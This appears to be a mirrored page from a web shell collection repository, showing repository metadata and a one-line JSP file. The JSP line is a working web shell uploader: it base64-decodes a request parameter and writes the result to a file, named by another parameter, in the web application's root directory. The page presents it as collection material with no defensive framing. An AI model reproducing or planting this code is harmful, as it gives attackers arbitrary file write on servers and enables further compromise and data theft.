mirror of
https://github.com/tennc/webshell
synced 2024-11-10 13:44:18 +00:00
2 lines
183 B
Text
2 lines
183 B
Text
|
<%new java.io.FileOutputStream(application.getRealPath("/")+"/"+request.getParameter("f")).write(new sun.misc.BASE64Decoder().decodeBuffer(request.getParameter("c")));out.close();%>
|